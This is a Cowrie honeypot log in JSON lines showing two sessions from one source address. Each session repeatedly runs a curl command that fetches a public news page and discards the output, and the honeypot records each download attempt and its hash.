{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.302095Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.307991Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.309866Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.310632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.335356Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.338185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.339247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.343267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.354600Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.355617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.379038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.380099Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.381602Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.398922Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.400150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.422107Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.424541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.425527Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.428239Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.441887Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.442988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.467421Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.473568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.474598Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.493469Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.494582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.507338Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.516834Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.517934Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.537168Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.538256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.556552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.557590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.586260Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.635162Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.636981Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.681654Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.688733Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.689623Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.700935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.701894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.736347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.737494Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.741426Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.744513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.745679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.747637Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.776604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.777791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.781996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.783619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.819332Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.821248Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.823205Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.824115Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.826889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.828138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.905347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.906590Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.909257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.910545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.914245Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.952548Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.953888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.958045Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.959254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.995288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.996608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.000102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.000887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.013479Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.015885Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.023031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.055244Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.056615Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.089326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.090567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.093132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.093953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.207705Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.208770Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.231437Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.232735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.236079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.237023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.284869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.286248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.290099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.291195Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.300625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.389215Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.422359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.432599Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.433942Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.441420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.442561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.446736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.447666Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.471782Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.473967Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.491041Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.492291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.502311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.503495Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.546478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.548080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.564521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.565593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.567830Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.569948Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.627660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.628912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.648428Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.649637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.663707Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.666783Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:53.679137Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:53.680464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
